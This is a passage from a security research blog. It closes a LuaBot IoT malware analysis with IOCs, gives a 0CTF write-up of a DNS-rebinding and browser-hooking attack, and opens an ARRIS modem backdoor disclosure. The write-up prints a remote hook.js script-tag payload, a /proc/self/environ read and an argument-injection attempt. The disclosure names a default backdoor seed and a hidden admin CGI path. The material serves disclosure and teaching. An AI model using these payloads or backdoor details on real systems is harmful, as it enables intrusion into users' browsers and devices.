<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyPw09jYD4p-VwIxEFDwYAK37_xmuDiuO8bZ5YYLNAo2hREJYs5VVKRyy5MQ5CHR5RLKEPh7YSmcwcnIdlSg-9I3ED8FR6X_DBSjS5p9MuX-5bmYXAHakvsbHVVUb6ZDY6n3l57UMgiS9W/s1600/lua_file_list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyPw09jYD4p-VwIxEFDwYAK37_xmuDiuO8bZ5YYLNAo2hREJYs5VVKRyy5MQ5CHR5RLKEPh7YSmcwcnIdlSg-9I3ED8FR6X_DBSjS5p9MuX-5bmYXAHakvsbHVVUb6ZDY6n3l57UMgiS9W/s400/lua_file_list.png" width="400" /></a></div>
<br />
The bot settings, including the DNS recurser and the CnC settings are hardcoded:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTph3bfvRClvS5oK_QiD4Rca8p52-Z42YywWExbPE7GWWwt6kYFNUobDOpVvh4a5d1vg5a8sLnj80vFzz1gYnngy_Iq3KUU7Po_6NGSL9A7t94vs8lGa3BS_L6m4PQW8I88gMGv478Lx7w/s1600/luabot_cfg.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTph3bfvRClvS5oK_QiD4Rca8p52-Z42YywWExbPE7GWWwt6kYFNUobDOpVvh4a5d1vg5a8sLnj80vFzz1gYnngy_Iq3KUU7Po_6NGSL9A7t94vs8lGa3BS_L6m4PQW8I88gMGv478Lx7w/s320/luabot_cfg.PNG" width="320" /></a></div>
<br />
The code is really well documented and it includes proxy checking functions and a masscan log parser:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvN3bHJvbGDV4mnAyQbb8aKbFfvhmooVcWSIS6tqO3Gx3V5AeXTkOAr0FS6IU2bl1YSFX_Z6HsD5MZRsPLGtcrCmEglRFXa7rsP7Zs8h5u2wDNY7TpWbxybpM8zXjpQBPo7P62GNTFjeCs/s1600/luabot_httpproxy.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvN3bHJvbGDV4mnAyQbb8aKbFfvhmooVcWSIS6tqO3Gx3V5AeXTkOAr0FS6IU2bl1YSFX_Z6HsD5MZRsPLGtcrCmEglRFXa7rsP7Zs8h5u2wDNY7TpWbxybpM8zXjpQBPo7P62GNTFjeCs/s400/luabot_httpproxy.PNG" width="400" /></a></div>
<br />
Bot author is seeding random with /dev/urandom (crypgtographers rejoice):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvg62ALDZQ9OkWXXLE0VLGaiFieprPSuxi7Owu2PmDIEJ7JsxzeXXp_tqgxa5Vvl1Zd5NXmetyhNTYi_5lYeKGoON9cA18DslVkSZatVsxBsDq67B199V0ZpnnDb8QcXeOfDpCysKPsw9/s1600/luabot_seedrandom.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvg62ALDZQ9OkWXXLE0VLGaiFieprPSuxi7Owu2PmDIEJ7JsxzeXXp_tqgxa5Vvl1Zd5NXmetyhNTYi_5lYeKGoON9cA18DslVkSZatVsxBsDq67B199V0ZpnnDb8QcXeOfDpCysKPsw9/s400/luabot_seedrandom.PNG" width="400" /></a></div>
<br />
LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGR6l5gP4TakIBM0xY2WvDxuyvMBIB9DcN4a3yuOdu6TK1pd-LaQ2L7AHPcbuP-9V_1NCAhYMdveylFzqeJAexAqfXn7MwXSpvmR24xd7o_T8a4zTT-sFEmO1NfUhl3vj6Eb-UNN7D41P/s1600/luabot_signedscript.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGR6l5gP4TakIBM0xY2WvDxuyvMBIB9DcN4a3yuOdu6TK1pd-LaQ2L7AHPcbuP-9V_1NCAhYMdveylFzqeJAexAqfXn7MwXSpvmR24xd7o_T8a4zTT-sFEmO1NfUhl3vj6Eb-UNN7D41P/s400/luabot_signedscript.PNG" width="400" /></a></div>
<br />
Meterpreter is so 2000's, the V7 JavaScript interpreter is named shiterpreter:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWsHPF7huNWokN3pUDp0TpYQsfPC70E1HTzOdo9ZOK836NlnZh4bRCXCkpcLJolQKItl2C7B5wAzInMQ0YDeIxwROUaanXNEM4JKgVCLmujab-YxPviUf7AaTgby3MPol7lCAY1BLHpdkx/s1600/luabot_shiterpreter.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWsHPF7huNWokN3pUDp0TpYQsfPC70E1HTzOdo9ZOK836NlnZh4bRCXCkpcLJolQKItl2C7B5wAzInMQ0YDeIxwROUaanXNEM4JKgVCLmujab-YxPviUf7AaTgby3MPol7lCAY1BLHpdkx/s400/luabot_shiterpreter.PNG" width="400" /></a></div>
<br />
There's a catchy function named checkanus.penetrate_sucuri, on what seems to be some sort of bypass for Sucuri's Denial of Service (DDoS) Protection:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQB3Tv6TMHcF2LFY1sA2u1SkY_MIRgzxYVdMFiMyoo8PftrnDv6idvYdf9BYME1A0tua3tIv4PGwFq0_8uLBaNYKxSGW9QvBHzmoh9hSfYl3DpJA0__BI2OO06VPQnvOBuSGBMw4-NwsRN/s1600/luabot_sucuri1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQB3Tv6TMHcF2LFY1sA2u1SkY_MIRgzxYVdMFiMyoo8PftrnDv6idvYdf9BYME1A0tua3tIv4PGwFq0_8uLBaNYKxSGW9QvBHzmoh9hSfYl3DpJA0__BI2OO06VPQnvOBuSGBMw4-NwsRN/s400/luabot_sucuri1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH8UlpW7OU6UVxj0r5gnsFILv3rIPi4Zz4JPnhWKpj_55KKD6Me6X-7Z53Ux7Na4pM-4IuodAXwP2C6fEvIKV5nJ6huS5opjnYILfSQ6WPx8ePeOMnovU_8joQK9JW8UsjfdkAxLu08pL7/s1600/luabot_sucuri2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH8UlpW7OU6UVxj0r5gnsFILv3rIPi4Zz4JPnhWKpj_55KKD6Me6X-7Z53Ux7Na4pM-4IuodAXwP2C6fEvIKV5nJ6huS5opjnYILfSQ6WPx8ePeOMnovU_8joQK9JW8UsjfdkAxLu08pL7/s400/luabot_sucuri2.PNG" width="297" /></a></div>
<br />
LuaBot has its own lua resolver function for DNS queries:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05nMw8-cEWfj23lbxYqeT2IwPlr2Aqeuk09RdzlKQ619DCzG_eYx71BeQvWetc308qm9X8o0hlaGU3OaLZkDzrZpVlJ1d8aarJsY3xToTWP01NS-s4h_klNEI7vm6GfSmR_J4AKhJ2Tyz/s1600/luabot_dns.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05nMw8-cEWfj23lbxYqeT2IwPlr2Aqeuk09RdzlKQ619DCzG_eYx71BeQvWetc308qm9X8o0hlaGU3OaLZkDzrZpVlJ1d8aarJsY3xToTWP01NS-s4h_klNEI7vm6GfSmR_J4AKhJ2Tyz/s400/luabot_dns.PNG" width="400" /></a></div>
<br />
Most of the bot capabilities are in line with the ones described on the <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die! blogpost</a>. It's interesting to note that the IPs from the CnC server and iptables rules don't overlap, probably because they're using different environments for different bot families (or they were simply updated).<br />
<br />
I did not analise the remote botnet structure, but the modular approach and the interoperability of the malware indicates that there's a professional and ongoing effort.<br />
<br />
<b><br /></b>
<b>Conclusion</b><br />
<b><br /></b></div>
<div>
The analysed malware doesn't have any persistence mechanism to survive reboots. It wouldn't try to reflash the firmware or modify volatile partitions (NVRAM for example), but the first stage payload restricts remote access to the device using custom iptables rules.<br />
<br />
This is a quite interesting approach because they can quickly masscan the Internet and block external access to those IoT devices and selectively infect them using the final stage payloads.<br />
<br />
On 2015, when I initially reported about the ARRIS backdoors, there were over <a href="https://twitter.com/bernardomr/status/667643475358318592">600.000 vulnerable ARRIS devices exposed on the Internet</a> and 490.000 of them had telnet services enabled:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkMCRNkrVnjBsEKmFPoMfWQGFlHYRlTEvjhOnbrMutfXPV1oK53KOkMERShi_qMu7yz3kXfZ_skHdbXV-Vl_ejSqhceqvnmGg0k9pPhPpS0nAcoj8fyRbCcZhfGxmjRHBj2-KyOwXH7ynw/s1600/arris-sep-2015-telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="407" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkMCRNkrVnjBsEKmFPoMfWQGFlHYRlTEvjhOnbrMutfXPV1oK53KOkMERShi_qMu7yz3kXfZ_skHdbXV-Vl_ejSqhceqvnmGg0k9pPhPpS0nAcoj8fyRbCcZhfGxmjRHBj2-KyOwXH7ynw/s640/arris-sep-2015-telnet.png" width="640" /></a></div>
If we perform the same query nowadays (September/2016) we can see that the number of exposed devices was reduced to approximately 35.000:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu0c9n7nj3T5Vlva5G94sSxAPmAGux5E6x5pmyKp5DEEnDnGwTB5YolT4oCdZHG0m_HdpiWSEPKsKur8klNiXcBoFF0XoKEzt5fJQzBzBFb0Eqb4YiJGOFUGlDbn82JYmoBa7YhR_R3NjL/s1600/arris-sep2016.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu0c9n7nj3T5Vlva5G94sSxAPmAGux5E6x5pmyKp5DEEnDnGwTB5YolT4oCdZHG0m_HdpiWSEPKsKur8klNiXcBoFF0XoKEzt5fJQzBzBFb0Eqb4YiJGOFUGlDbn82JYmoBa7YhR_R3NjL/s640/arris-sep2016.png" width="640" /></a></div>
I know that the media coverage and the <a href="https://www.kb.cert.org/vuls/id/419568">security bulletins</a> contributed to that, but I wonder how much of those devices were infected and had external access restricted by some sort of malware...<br />
<br /></div>
<div>
The high number of Linux devices with Internet-facing administrative interfaces, the use of <a href="https://www.gnu.org/proprietary/proprietary-back-doors.html">proprietary Backdoors</a>, the lack of firmware updates and the ease to craft IoT exploits make them easy targets for online criminals.<br />
<br />
<div>
IoT botnets are becoming a thing: manufacturers have to start building secure and reliable products, ISPs need to start shipping updated devices/firmwares and the final user has to keep his home devices patched/secured.</div>
<br />
We need to find better ways to detect, block and contain this new trend. Approaches like the one from <a href="http://senr.io/">SENRIO</a> can help ISPs and Enterprises to have a better visibility of their IoT ecosystems. Large scale firmware analysis can also contribute and provide a better understanding of the security issues for those devices.<br />
<br />
<br /></div>
<div>
<b><span style="font-family: inherit;">Indicators of Compromise (IOCs)</span></b><br />
<b><span style="font-family: inherit;"><br /></span></b>
<span style="font-family: inherit;">LuaBot ARMEB Binaries:</span></div>
<div>
<ul>
<li>drop (5deb17c660de9d449675ab32048756ed)</li>
<li>.nttpd (c867d00e4ed65a4ae91ee65ee00271c7)</li>
<li>.sox (4b8c0ec8b36c6bf679b3afcc6f54442a)</li>
<li>.sox.rslv (889100a188a42369fd93e7010f7c654b)</li>
<li>.arm_puma5 (061b03f8911c41ad18f417223840bce0)</li>
</ul>
<br />
GCC Toolchains:<br />
<ul>
<li>GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4</li>
<li>GCC: (GNU) 4.2.0 TI-Puma5 20100224</li>
</ul>
<br />
Dropper and CnC IPs:<br />
<ul>
<li>46.148.18.122</li>
<li>80.87.205.92</li>
</ul>
<div>
<br /></div>
IP Ranges whitelisted by the Attacker:</div>
<div>
<ul>
<li>46.148.18.0/24</li>
<li>185.56.30.0/24</li>
<li>217.79.182.0/24</li>
<li>85.114.135.0/24</li>
<li>95.213.143.0/24</li>
<li>185.53.8.0/24</li>
</ul>
<div>
<br /></div>
</div>
</div>
Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com5tag:blogger.com,1999:blog-3296471108082693838.post-64729293269064900452016-03-13T21:01:00.003-03:002016-03-15T19:09:18.704-03:000CTF 2016 Write Up: Monkey (Web 4)The Chinese <a href="https://ctf.0ops.sjtu.cn/">0CTF</a> took place on March 12-13 and it was yet another fun CTF. I played with my teammates from <a href="https://ctftime.org/team/10288">TheGoonies</a> and we were ranked #48.<br />
<br />
I found the Web task "Monkey" particularly interesting: I solved it with the help from my friend <a href="https://twitter.com/danilonc">@danilonc</a>, but it took way longer than it should because of some **Spoiler Alert** DNS glitches. According to the scoreboard status, approximately 35 teams were able to solve it.<br />
<br />
<b>Task: Monkey (Web - 4pts)</b><br />
<br />
<div class="code">
What is Same Origin Policy?<br />
<br />
you can test this problem on your local machine<br />
<br />
http://202.120.7.200</div>
<br />
The running application receives a Proof-of-Work string and an arbitrary URL, instructing a "monkey" to browse the inputted URL for 2 minutes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75yJN4PKP54CO2CqL8kocfHBAFwlp3UuxR3g1YMnWNkBuqbSCalS-kzcgi1UxSHVz3M8XYf_Gc0ixBXYGb9dZQ2NUDmW28DJ7fkKUjWmJkgcZO-mJuz_352edHFcgrXAth2KXfRRtsMXx/s1600/Screen+Shot+2016-03-13+at+15.32.39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75yJN4PKP54CO2CqL8kocfHBAFwlp3UuxR3g1YMnWNkBuqbSCalS-kzcgi1UxSHVz3M8XYf_Gc0ixBXYGb9dZQ2NUDmW28DJ7fkKUjWmJkgcZO-mJuz_352edHFcgrXAth2KXfRRtsMXx/s320/Screen+Shot+2016-03-13+at+15.32.39.png" width="320" /></a></div>
<b>Proof-of-Work</b><br />
<br />
Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars from its MD5 against the challenge. The POW challenge was more cpu-intensive than normal, so the traditional bash/python one-liner ctf scripts would require some performance improvements.<br />
<br />
<a href="https://twitter.com/danilonc">@danilonc</a> had written a quick hack using Go to bruteforce and solve POW from older CTF challs, so we just slightly modified it:<br />
<br />
<script src="https://gist.github.com/bmaia/99052777c4046e974af0.js"></script>
<br />
<div class="separator" style="clear: both; text-align: left;">
Solving the Proof-of-Work:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkVzwtQBDZfy1tPHSmjMfN62DDL7I4wMT8IVVHgUGg8t57ykiJI5s-e37x9kAZyNo-PSwjc4zhyajouq9RiklMJjrAefqtNaSpgPPOYV9YRlv190YrN4Bo3SUyVG8namFDDOMZETqOmF8Z/s1600/Screen+Shot+2016-03-13+at+16.26.49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkVzwtQBDZfy1tPHSmjMfN62DDL7I4wMT8IVVHgUGg8t57ykiJI5s-e37x9kAZyNo-PSwjc4zhyajouq9RiklMJjrAefqtNaSpgPPOYV9YRlv190YrN4Bo3SUyVG8namFDDOMZETqOmF8Z/s400/Screen+Shot+2016-03-13+at+16.26.49.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Same-Origin-Policy and CORS</b></div>
<b><br /></b>
The Same-Origin-Policy (SOP) deems pages having the same URI scheme, hostname and port as residing at the same-origin. If any of these three attributes varies, the resource is in a different origin. Hence, if provided resources come from the same hostname, scheme and port, they can interact without restriction.<br />
<br />
If you try to use an XMLHttpRequest to send a request to a different origin, you can’t read the response. However, the request will still arrive at its destination. This policy prevents a malicious script on one page from obtaining access to sensitive data (both the header and the body) on another web page, on a different origin.<br />
<br />
For this particular CTF challenge, if the secret internal webpage had had an insecure CORS header like "Access-Control-Allow-Origin: *", we would be able to retrieve its data with no effort. This, of course, was not the case.<br />
<div>
<br /></div>
<b><br /></b>
<b>Bypassing the Same-Origin</b><br />
<br />
The flag was accessible on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hooking the monkey's browser using <a href="https://github.com/beefproject/beef">BeEF</a>, so we could fingerprint his device, platform, plugins and components.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjupZD4IIX892C8JphnxQoWLP0qBdk0F10V0y_LRMJvxkMWmr6jzsM3ZeYwmjQRa8w05PKN86mmWvtluyrUKFCad2RANdxjoOcfyNf676Uq3C9Dd2fewVWsOWfAvPeMzaslRYK4AnbKxEP-/s1600/Screen+Shot+2016-03-13+at+15.19.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjupZD4IIX892C8JphnxQoWLP0qBdk0F10V0y_LRMJvxkMWmr6jzsM3ZeYwmjQRa8w05PKN86mmWvtluyrUKFCad2RANdxjoOcfyNf676Uq3C9Dd2fewVWsOWfAvPeMzaslRYK4AnbKxEP-/s400/Screen+Shot+2016-03-13+at+15.19.50.png" width="256" /></a></div>
<br />
There was nothing interesting here, a custom user-agent and no known vulnerable component. We enumerated the chars accepted by the server with the following script:<br />
<br />
<script src="https://gist.github.com/bmaia/255d3f4210998ed19c3b.js"></script>
Unfortunately, the server was rejecting special chars like spaces (%20 and +) and there was no command injection signal. Our evil plan to input <b>--disable-web-security $URL</b> to disable Chrome's SOP didn't work so we had to find new ways to retrieve the secrets.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi81vq1F0VoynDsDLzZ2Pci13EOUQq4Xc8S89tahhPfiGUsQoN_BTb9X9UIeQ6CsjZPU8kVt5pR0yihxTrLTkM1j1D5lDlyOiS-92guRbpTYrNS-7kxzWc9yG7g54A759cmiww8aBtosPqf/s1600/Screen+Shot+2016-03-13+at+17.43.37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi81vq1F0VoynDsDLzZ2Pci13EOUQq4Xc8S89tahhPfiGUsQoN_BTb9X9UIeQ6CsjZPU8kVt5pR0yihxTrLTkM1j1D5lDlyOiS-92guRbpTYrNS-7kxzWc9yG7g54A759cmiww8aBtosPqf/s640/Screen+Shot+2016-03-13+at+17.43.37.png" width="640" /></a></div>
<br />
We also thought about using data:uri and file schemes to load a malicious script/webpage, but it wouldn't help us to bypass the SOP. We tried to input URL's like <b><html><script/**/src='http://www.example.com:8000/hook.js'></script></html></b> and <b>file:///proc/self/environ</b> (setting custom headers with a malicious HTML), but that is also known not to work on modern browsers.<br />
<br />
<br />
<b>DNS Rebinding</b><br />
<br />
After some discussion, we came to the conclusion that we needed to perform a DNS Rebinding attack. <a href="https://twitter.com/devttyS0">devttys0</a> presented about <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Heffner/DEFCON-18-Heffner-Routers.pdf">this class of vulnerabilities at DEFCON 18</a> and <a href="https://twitter.com/mikispag">@mikispag</a> recently wrote a detailed post describing how to use <a href="https://miki.it/blog/2015/4/20/the-power-of-dns-rebinding-stealing-wifi-passwords-with-a-website/">DNS rebinding to steal WiFi passwords</a>.<br />
<br />
DNS rebinding is a technique that can be used to perform a breach of same-origin restrictions, enabling a malicious website to interact with a different domain. The possibility of this attack arises because the segregations in the SOP are based primarily on domain name and port, whereas the ultimate delivery of HTTP requests involves converting domain names into IP addresses.<br />
<br />
We had some issues at first because we tried to use the free DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to hook the user's browser when using the service.<br />
<br />
In order to make our life miserable, the challenge monkey would browse the site for two minutes only: we also could't use the DNS services from Namecheap because the minimum TTL time is 60 seconds.<br />
<br />
<b><br /></b>
<b>Attack Phase</b><br />
<br />
After deciding to set up the DNS server on our own, we came with the following attack scenario:<br />
<br />
1) User visits the beef hook page at http://ctf.example.com:8080 (IP 1.2.3.4).<br />
<br />
2) Webpage will load BeEF javascript hook and his browser will become a zombie.<br />
<br />
3) We perform a DNS Rebind to change the A Record from 1.2.3.4 to 127.0.0.1. <a href="https://twitter.com/danilonc">@danilonc</a> set the BIND Zone file with a low TTL (1 sec) and replaced the answer (lines 14-15) as soon as the browser got hooked.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-3P_o01R4Vpw6c4NjKCozymUm1wXv07Ehl-stZ52RQGKvfTJcROwu4HE3gtQkNsj6uliFvTDBOQN4gmVWrAWUy-tcyUofmCPgjWjmPjWVxTsYhRuxAHimBYLUec9Vf27B3bvsDqHRvnq/s1600/bind.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-3P_o01R4Vpw6c4NjKCozymUm1wXv07Ehl-stZ52RQGKvfTJcROwu4HE3gtQkNsj6uliFvTDBOQN4gmVWrAWUy-tcyUofmCPgjWjmPjWVxTsYhRuxAHimBYLUec9Vf27B3bvsDqHRvnq/s400/bind.PNG" width="400" /></a></div>
<br />
4) Perform a CORS request using BeeF's "Test CORS Request" module.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi66A2k1wQ2UE7o9h5uY4UkUuPUlOfEVYCmnXQ8h_AZtRcoNrjKuhvfyxwsRNxCRR-xQBsLoEl2J2eLgX0Wq59UHD8P2ED905S325-wqRahmBvBTt3CAxJLYbTLAR5waSnNYH715IKFfXIf/s1600/Screen+Shot+2016-03-12+at+18.24.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi66A2k1wQ2UE7o9h5uY4UkUuPUlOfEVYCmnXQ8h_AZtRcoNrjKuhvfyxwsRNxCRR-xQBsLoEl2J2eLgX0Wq59UHD8P2ED905S325-wqRahmBvBTt3CAxJLYbTLAR5waSnNYH715IKFfXIf/s400/Screen+Shot+2016-03-12+at+18.24.15.png" width="400" /></a></div>
<br />
Here's a small diagram of the attack:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjf0b7dMwB271jhhbNjvYqLw67wb4jGhIVoDIZc1ecZYMlppaeFI713BLfYfKYj-cBrPwPigooxevSJBtCeaosSX_mm6-nigSGHFutqqt-oCuTFzOxd22mwxdVG6F7XfMipI6eXZQVK5f/s1600/rebinding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjf0b7dMwB271jhhbNjvYqLw67wb4jGhIVoDIZc1ecZYMlppaeFI713BLfYfKYj-cBrPwPigooxevSJBtCeaosSX_mm6-nigSGHFutqqt-oCuTFzOxd22mwxdVG6F7XfMipI6eXZQVK5f/s640/rebinding.png" width="640" /></a></div>
<br />
<br />
After a couple of tries we finally managed to get the flag:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1w1v9jfmeHargIKxEcOElU1kArox-WJwVr-8U_EHarThTcMTyE1CSSZ2piFIGdRUsT8PRT_DBXjs0KZjLmXJbTIvDSm_1vUC83naIrX54jrO1Cxb1ZEH7g5wneNC6EEbxvUfg6VhDaRTp/s1600/Screen+Shot+2016-03-12+at+18.46.56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1w1v9jfmeHargIKxEcOElU1kArox-WJwVr-8U_EHarThTcMTyE1CSSZ2piFIGdRUsT8PRT_DBXjs0KZjLmXJbTIvDSm_1vUC83naIrX54jrO1Cxb1ZEH7g5wneNC6EEbxvUfg6VhDaRTp/s640/Screen+Shot+2016-03-12+at+18.46.56.png" width="640" /></a></div>
<br />
Flag: <b>0ctf{monkey_likes_banananananananaaaa}</b><br />
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com2tag:blogger.com,1999:blog-3296471108082693838.post-70197294034045289562015-11-19T11:07:00.000-02:002015-11-20T00:02:04.788-02:00ARRIS Cable Modem has a Backdoor in the Backdoor<span style="font-family: inherit;">A couple of months ago, some friends invited me to give a talk at <a href="http://www.nullbyte-con.org/">NullByte Security Conference</a>. I started to study about some <strike>embedded device</strike> junk hacking hot topics and decided to talk about cable modem security. <a href="https://twitter.com/drspringfield">Braden Thomas</a> keynoted at Infiltrate 2015 discussing about <a href="https://bitbucket.org/drspringfield/cabletables/downloads/PracticalAttacksOnDOCSIS.pdf">Practical Attacks on DOCSIS</a> so, yeah, cable modem hacking is still mainstream.</span><br />
<br />
On November 21st I'll be at Salvador speaking on "Hacking cable modems: The Later Years". It's not a talk about theft of service and getting free Internet access. I'll focus on the security of the cable modems, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmwares. Spoiler Alert: everything's really really bad.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW3SD6ye2ds8VDjOqKNQ3fHtnU_5G4mHd8SOF5ffiDIanaE-EffxvmhgjjZxkIdjxyFrlW45QS5ZDDZyzxt8bGqQGHIXwk1UfnkcZp0QqNfi3bAA3wFJsSIwN7LIpMYOVrEKU8QN8Il6GR/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW3SD6ye2ds8VDjOqKNQ3fHtnU_5G4mHd8SOF5ffiDIanaE-EffxvmhgjjZxkIdjxyFrlW45QS5ZDDZyzxt8bGqQGHIXwk1UfnkcZp0QqNfi3bAA3wFJsSIwN7LIpMYOVrEKU8QN8Il6GR/s320/Capturar.PNG" width="320" /></a></div>
<br />
Securing cable modems is more difficult than other embedded devices because, on most cases, you can’t choose your own device/firmware and software updates are almost entirely controlled by your ISP.<br />
<br />
While researching on the subject, I found a previously undisclosed backdoor on ARRIS cable modems, affecting many of their devices including TG862A, TG862G, DG860A. As of this writing, Shodan searches indicate that the backdoor affects over 600.000 externally accessible hosts and the vendor did not state whether it's going to fix it yet.<br />
<br />
<b><br /></b>
<b>ARRIS Backdoors</b><br />
<br />
ARRIS SOHO-grade cable modems contain an undocumented library (libarris_password.so) that acts as a backdoor, allowing privileged logins using a custom password.<br />
<br />
The following files load the backdoor library on ARRIS TG862A Firmware TS0705125D_031115_MODEL_862_GW (released on 2015):<br />
<br />
<div class="code">
/usr/sbin/arris_init<br />
/usr/sbin/dimclient<br />
/usr/sbin/docsis_mac_manager<br />
/usr/sbin/ggncs<br />
/usr/sbin/gw_api<br />
/usr/sbin/mini_cli<br />
/usr/sbin/pacm_snmp_agent<br />
/usr/sbin/snmp_agent_cm<br />
/usr/www/cgi-bin/adv_pwd_cgi<br />
/usr/www/cgi-bin/tech_support_cgi</div>
<br />
<a href="http://www.borfast.com/projects/arris-password-of-the-day-generator">ARRIS password of the day</a> is a remote backdoor known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily backdoor password. The default seed is MPSJKMDHAI and guess what - many ISPs won't bother changing it at all.<br />
<br />
The backdoor account can be used to enable Telnet and SSH remotely via the hidden HTTP Administrative interface "<a href="http://192.168.100.1/cgi-bin/tech_support_cgi">http://192.168.100.1/cgi-bin/tech_support_cgi</a>" or via custom SNMP MIBs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
